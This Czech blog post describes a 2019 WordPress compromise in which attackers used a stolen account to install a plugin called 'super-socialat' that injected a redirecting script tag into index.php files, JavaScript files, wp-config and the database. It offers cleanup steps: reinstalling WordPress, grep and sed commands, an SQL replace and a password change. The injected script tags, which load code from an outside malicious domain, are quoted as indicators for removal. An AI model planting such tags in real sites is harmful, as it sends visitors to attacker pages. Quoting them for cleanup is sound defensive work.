Co se přihodilo?
Dne 6.11.2019 v ranních hodinách se na několika webech objevil malware, který přesměrovává web na reklamní stránky.
V logovacím skriptu jsem objevil, že se pomocí existujícího uživatele někdo připojil z IP adres 185.212.128.231 a 185.212.128.232. Následně nahrál plugin: super-socialat, ten rozbalil a pomocí jeho skriptů se všude roznesly škodlivé kódy.
Sledovací kód se nahrál do všech souborů index.php a to do všech složek.
<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>
Dále se nahrály další typy souborů, ovlivněn je také wp-config soubor, hlavní index.php v rootu WP a také všechny javascriptové soubory v adresářích wp-includes a wp-admin.
Možné příčiny průniku
Vladimír Smitka ze společnosti Lynt.cz analyzoval stovky napadených webů a vše podle něj ukazuje na 3 možné příčiny.
Přečte si více v komentáři zde pod článkem.
Postup pro odstranění malwaru:
Doporučuji zaprvé jít na stránku /wp-admin/update-core.php a přeinstalovat aktuální verzi WordPress. Tím se zbavíte všech infikovaných souborů ve složkách wp-includes a wp-admin.
Připojte se na server přes terminál (SSH), můžete se podívat, které soubory mají v sobě infikovaný kód:
grep -rlw --include="index.php" -e "trasnaltemyrecords" /www/(cesta k vaší WP instalaci)
Dále pak můžete použít tento skript pro smazání výše zmíněného sledovacího kódu ze všech souborů.
grep -rl "<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>" | xargs sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g"
Dále musíte promazat soubory, které tam nemají co dělat. Je to cca 2-5 php souborů a poznáte je na první pohled. Jsou to názvy jako “wn-SlrBYutdKq.php”, “c8iocdreai.php”, “68i7kau19g.php”, ale tyto názvy budou asi u každého jinak.
Podívejte se do:
- hlavní složka instalace
- složky /wp-content/uploads/
Tento malware se nahrál i do databáze, do tabulek jako wp_posts a několik dalších. Takže i do obsahu Vašeho webu. SQL příkaz na vymazání nebezpečného kódu nemám, neb jsem měl všude zálohu databáze a mohl jsem ji bez potíží využít.
Měl by však pomoci tento SQL příkaz:
UPDATE wp_posts SET post_content = REPLACE(post_content, “<script src=\’https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043\’ type=\’text/javascript\’></script>”, “”) WHERE post_content LIKE “%<script src=\’https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043\’ type=\’text/javascript\’></script>%”
Je doporučeno ihned změnit heslo do databáze, toto heslo bylo kompromitováno.
Nakonec si tedy ještě zkontrolujte, že tam opravdu plugin super-socialat už není.
Budeme rádi za Váš názor